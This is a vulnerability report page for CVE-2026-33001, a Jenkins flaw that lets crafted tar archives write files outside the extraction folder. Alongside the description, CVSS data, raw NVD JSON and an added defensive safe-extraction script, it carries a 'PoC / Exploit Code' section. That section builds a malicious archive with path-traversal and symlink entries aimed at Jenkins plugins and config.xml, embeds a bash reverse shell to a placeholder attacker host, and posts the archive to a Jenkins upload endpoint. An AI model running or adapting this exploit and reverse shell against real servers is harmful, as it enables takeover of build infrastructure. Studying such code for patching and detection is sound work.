Security Vulnerability Report
CVE-2026-33001 CVSS 8.8 HIGH

CVE-2026-33001

Published: 2026-03-18 16:16:28
Last Modified: 2026-03-20 18:08:16

Description

Jenkins 2.554 and earlier, LTS 2.541.2 and earlier does not safely handle symbolic links during the extraction of .tar and .tar.gz archives, allowing crafted archives to write files to arbitrary locations on the filesystem, restricted only by file system access permissions of the user running Jenkins. This can be exploited to deploy malicious scripts or plugins on the controller by attackers with Item/Configure permission, or able to control agent processes.
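The defect described above is the classic CWE-59 archive-extraction problem: a tar member name that climbs out of the extraction root, or a link entry whose target does, lets an archive write wherever the extracting user can. The following is an added example (not code from the page or from the Jenkins project) showing the checks an extractor needs: every member is tested against the extraction root, link targets are resolved the same way, and during extraction the test is repeated against the real filesystem so a symlink created by an earlier member cannot redirect a later write. The root path `/srv/extract` and the sample archive are constructed for the demonstration.

```python
#!/usr/bin/env python3
"""Added example, not code from the page or the Jenkins project.

Demonstrates how to refuse the archive shapes behind CVE-2026-33001 (CWE-59):
members must land inside the extraction root, link entries must point inside
it, and the check is repeated against the live filesystem during extraction.
"""
import io
import os
import tarfile
import tempfile


def _escapes(root, candidate):
    """True when `candidate` resolves (lexically and through any symlinks that
    already exist on disk) to a location outside `root`."""
    root_real = os.path.realpath(root)
    return os.path.commonpath([root_real, os.path.realpath(candidate)]) != root_real


def _check_member(root, member):
    """Return a reason string if `member` must not be extracted under `root`,
    otherwise None."""
    dest = os.path.join(root, member.name)
    if os.path.isabs(member.name) or _escapes(root, dest):
        return "path traversal in member name"
    if member.issym() or member.islnk():
        # A symlink target is relative to the link's own directory; a hard
        # link target is relative to the extraction root.
        base = os.path.dirname(dest) if member.issym() else root
        target = os.path.join(base, member.linkname)
        if os.path.isabs(member.linkname) or _escapes(root, target):
            return f"link escapes root: {member.linkname}"
    elif not (member.isfile() or member.isdir()):
        return "special file (device/fifo) not allowed"
    return None


def find_unsafe_members(tar_bytes, root="/srv/extract"):
    """Static pre-check usable as a scanner: (name, reason) for every member
    that would escape `root`. The root is constructed; it need not exist."""
    findings = []
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r:*") as tar:
        for m in tar.getmembers():
            reason = _check_member(root, m)
            if reason:
                findings.append((m.name, reason))
    return findings


def safe_extract(tar_bytes, root=None):
    """Extract member by member into `root` (a fresh temp dir by default),
    re-checking each one against the filesystem as left by the previous
    members, and raise ValueError on the first member that would escape.
    Returns the names that were extracted."""
    root = root or tempfile.mkdtemp(prefix="safe_extract_")
    os.makedirs(root, exist_ok=True)
    # Python 3.12+ (and the backports) ship tarfile's 'data' filter; use it
    # as a second line of defence when present. Our own checks run first.
    kwargs = {"filter": "data"} if hasattr(tarfile, "data_filter") else {}
    extracted = []
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r:*") as tar:
        for m in tar.getmembers():
            reason = _check_member(root, m)
            if reason:
                raise ValueError(f"refusing {m.name!r}: {reason}")
            tar.extract(m, path=root, **kwargs)
            extracted.append(m.name)
    return extracted


def extraction_refused(tar_bytes):
    """True when safe_extract rejects the archive."""
    try:
        safe_extract(tar_bytes)
    except ValueError:
        return True
    return False


def _add_file(tar, name, data):
    info = tarfile.TarInfo(name)
    info.size = len(data)
    tar.addfile(info, io.BytesIO(data))


def _add_symlink(tar, name, target):
    info = tarfile.TarInfo(name)
    info.type = tarfile.SYMTYPE
    info.linkname = target
    tar.addfile(info)


def build_sample_archive(include_unsafe):
    """Constructed fixture (not a real Jenkins artifact): a small .tar.gz with a
    benign file and an in-root symlink; with include_unsafe=True it also
    carries a traversal member name and a symlink whose target leaves the root."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        _add_file(tar, "notes/readme.txt", b"hello\n")
        _add_symlink(tar, "notes/latest", "readme.txt")
        if include_unsafe:
            _add_file(tar, "../escape.txt", b"outside the root\n")
            _add_symlink(tar, "escape_link", "../../outside")
    return buf.getvalue()


if __name__ == "__main__":
    for name, reason in find_unsafe_members(build_sample_archive(True)):
        print(f"REJECT {name}: {reason}")
    print("clean archive extracted:", safe_extract(build_sample_archive(False)))
```

The static scan is what a pre-upload check or a detection rule can run without touching disk; the per-member re-check in `safe_extract` is what closes the gap that a purely lexical check leaves, because it sees symlinks that earlier members have already created. A Java extractor needs the same canonical-path comparison before creating each entry; Python's own `tarfile` has shipped this policy as the `data` filter since 3.12 (backported to the 3.8 to 3.11 security releases).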

CVSS Details

CVSS Score: 8.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:jenkins:jenkins:*:*:*:*:lts:*:*:* - VULNERABLE
cpe:2.3:a:jenkins:jenkins:*:*:*:*:-:*:*:* - VULNERABLE
Jenkins < 2.555
Jenkins LTS < 2.541.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
# CVE-2026-33001 PoC - Jenkins Symbolic Link Arbitrary File Write
# This PoC demonstrates creating a malicious tar archive with symbolic links
import tarfile
import os
import io


def create_malicious_tar():
    """
    Create a malicious tar archive containing symbolic links
    that can write files to arbitrary locations on Jenkins server
    """
    # Create the malicious tar archive in memory
    tar_buffer = io.BytesIO()
    with tarfile.open(fileobj=tar_buffer, mode='w', format=tarfile.PAX_FORMAT) as tar:
        # Create a regular file that will be written via symlink
        malicious_content = b'#!/bin/bash\n# Malicious script injected via CVE-2026-33001\n# This could contain reverse shell or other malicious code\n/bin/bash -i >& /dev/tcp/attacker/4444 0>&1\n'
        info = tarfile.TarInfo(name='../../../../../../var/jenkins_home/userContent/malicious.sh')
        info.size = len(malicious_content)
        tar.addfile(info, io.BytesIO(malicious_content))

        # Create symlink entry pointing to Jenkins plugin directory
        # This allows overwriting existing plugin files
        link_info = tarfile.TarInfo(name='plugin.txt')
        link_info.type = tarfile.SYMTYPE
        link_info.linkname = '../../../../../../var/jenkins_home/plugins/evilPlugin.jpi'
        tar.addfile(link_info)

        # Alternative: Symlink to overwrite config files
        config_link = tarfile.TarInfo(name='config.xml')
        config_link.type = tarfile.SYMTYPE
        config_link.linkname = '../../../../../../var/jenkins_home/config.xml'
        tar.addfile(config_link)

    return tar_buffer.getvalue()


def exploit_jenkins(target_url, tar_data):
    """
    Upload and extract malicious tar archive on Jenkins
    Requires Item/Configure permission or agent process control
    """
    import requests

    # Upload the malicious archive
    upload_url = f"{target_url}/descriptorByName/hudson.tasks.Maven/installSource/upload"
    files = {
        'upload': ('malicious.tar.gz', tar_data, 'application/x-gzip')
    }

    # Send the malicious archive
    response = requests.post(upload_url, files=files)
    return response.status_code == 200


if __name__ == '__main__':
    print("CVE-2026-33001 PoC - Jenkins Symbolic Link Attack")
    print("Target: Jenkins <= 2.554 or LTS <= 2.541.2")
    print("\nCreating malicious tar archive...")
    malicious_tar = create_malicious_tar()
    print(f"Generated tar archive: {len(malicious_tar)} bytes")

    # Save for manual testing
    with open('malicious_archive.tar.gz', 'wb') as f:
        f.write(malicious_tar)
    print("Archive saved as 'malicious_archive.tar.gz'")
    print("\nNote: This PoC is for educational and security research purposes only.")
```

References

https://www.jenkins.io/security/advisory/2026-03-18/#SECURITY-3657 (Vendor Advisory)
Raw JSON Data

```json
{"cve": {"id": "CVE-2026-33001", "sourceIdentifier": "[email protected]", "published": "2026-03-18T16:16:28.067", "lastModified": "2026-03-20T18:08:15.507", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Jenkins 2.554 and earlier, LTS 2.541.2 and earlier does not safely handle symbolic links during the extraction of .tar and .tar.gz archives, allowing crafted archives to write files to arbitrary locations on the filesystem, restricted only by file system access permissions of the user running Jenkins.\nThis can be exploited to deploy malicious scripts or plugins on the controller by attackers with Item/Configure permission, or able to control agent processes."}, {"lang": "es", "value": "Jenkins 2.554 y anteriores, LTS 2.541.2 y anteriores no maneja de forma segura los enlaces simbólicos durante la extracción de archivos .tar y .tar.gz, permitiendo que archivos especialmente diseñados escriban archivos en ubicaciones arbitrarias del sistema de archivos, restringido únicamente por los permisos de acceso al sistema de archivos del usuario que ejecuta Jenkins.\nEsto puede ser explotado para desplegar scripts o plugins maliciosos en el controlador por atacantes con permiso de Elemento/Configurar, o capaces de controlar procesos de agente."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-59"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:jenkins:jenkins:*:*:*:*:lts:*:*:*", "versionEndExcluding": "2.541.3", "matchCriteriaId": "74E8B1F1-D28F-4BC1-B50C-F736D7FA12B1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:jenkins:jenkins:*:*:*:*:-:*:*:*", "versionEndExcluding": "2.555", "matchCriteriaId": "D1012DE2-C6E3-4BEA-BA8E-C83B07D8DD25"}]}]}], "references": [{"url": "https://www.jenkins.io/security/advisory/2026-03-18/#SECURITY-3657", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
```